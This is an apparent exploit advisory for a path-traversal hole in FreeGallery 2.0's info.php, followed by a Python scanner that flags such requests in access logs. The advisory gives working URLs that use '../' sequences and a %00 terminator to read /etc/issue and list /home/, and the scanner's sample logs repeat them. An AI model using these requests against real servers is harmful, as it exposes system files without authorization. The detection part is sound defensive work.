Code:
# exploit title: wired bug in freegallery 2.0
# date: 14.o3.2o11
# author: lemlajt
# software : free gallery
# version: 2.0
# tested on: linux
# cve :
# Details:

Visit:
http://localhost/freegallery-2.0/info.php?base=640&file=../../../../../../../../../../../etc/issue%00
and click view source:

| <a href='/www/cmsadmins/freg/freegallery-2.0/info.php?base=640&file=//////////etc/speech-dispatcher'>Next ></a><br />

Because of :
ls -la /etc/| grep speech
drwxr-xr-x 4 root root 4096 2010-10-07 18:13 speech-dispatcher

so now: try:
http://localhost/freegallery-2.0/info.php?base=640&file=../../../../../../../../../../../home/
and again: view source.

http://localhost/freegallery-2.0/info.php?base=640&file=../../../../../../../../../../../home/

# regards,
# lemlajt
# *
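A log check for the request shapes shown above, as an added example that is not part of the original advisory: it flags `file` values sent to info.php that contain a NUL byte, a `..` path segment or an absolute path. The log lines are constructed, and the function names and the combined-log request format are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines: two reuse the advisory's request shapes, two are benign.
SAMPLE_LOG = [
    '127.0.0.1 - - [14/Mar/2011:10:00:01 +0100] "GET /freegallery-2.0/info.php?base=640&file=../../../../../../../../../../../etc/issue%00 HTTP/1.1" 200 912',
    '127.0.0.1 - - [14/Mar/2011:10:00:09 +0100] "GET /freegallery-2.0/info.php?base=640&file=//////////etc/speech-dispatcher HTTP/1.1" 200 874',
    '127.0.0.1 - - [14/Mar/2011:10:01:30 +0100] "GET /freegallery-2.0/info.php?base=640&file=holiday/beach.jpg HTTP/1.1" 200 1530',
    '127.0.0.1 - - [14/Mar/2011:10:01:41 +0100] "GET /freegallery-2.0/info.php?base=640&file=trip..2011.jpg HTTP/1.1" 200 1498',
]
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so nested encoding cannot hide '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_file_param(value):
    """Return the reasons a `file` value matches the pattern in the advisory."""
    v = fully_decode(value)
    reasons = set()
    if "\x00" in v:                       # %00 terminator, as in the first URL
        reasons.add("nul-byte")
    if ".." in re.split(r"[\\/]+", v):    # '..' as a whole path segment only
        reasons.add("dot-dot")
    if v.startswith(("/", "\\")):         # absolute path, as in the Next link
        reasons.add("absolute-path")
    return reasons

def scan(lines, script="info.php", param="file"):
    """Return (line_no, decoded_value, reasons) for each suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or not url.path.endswith("/" + script):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = classify_file_param(value) if key == param else set()
            if reasons:
                findings.append((n, fully_decode(value), sorted(reasons)))
    return findings

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A file name such as `trip..2011.jpg` is not flagged, because `..` only counts when it is a complete path segment.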